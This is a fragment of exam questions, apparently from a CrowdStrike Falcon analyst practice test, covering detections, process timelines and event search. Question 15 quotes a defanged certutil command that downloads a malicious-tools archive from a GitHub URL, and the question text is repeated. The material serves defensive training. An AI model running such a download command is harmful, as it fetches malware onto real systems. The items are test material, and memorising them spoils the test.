Question 11
Detections in Falcon are classified by their origin. Which of the following is NOT a recognized type of detection?
Question 12
What types of events are returned by a Process Timeline?
Question 13
What does the Full Detection Details option provide?
Question 14
What does pivoting to an Event Search from a detection do?
Question 15
You receive a detection on certutil.exe executing the following command line:
certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip " What is the appropriate next step to discover how this occurred?
certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip " What is the appropriate next step to discover how this occurred?
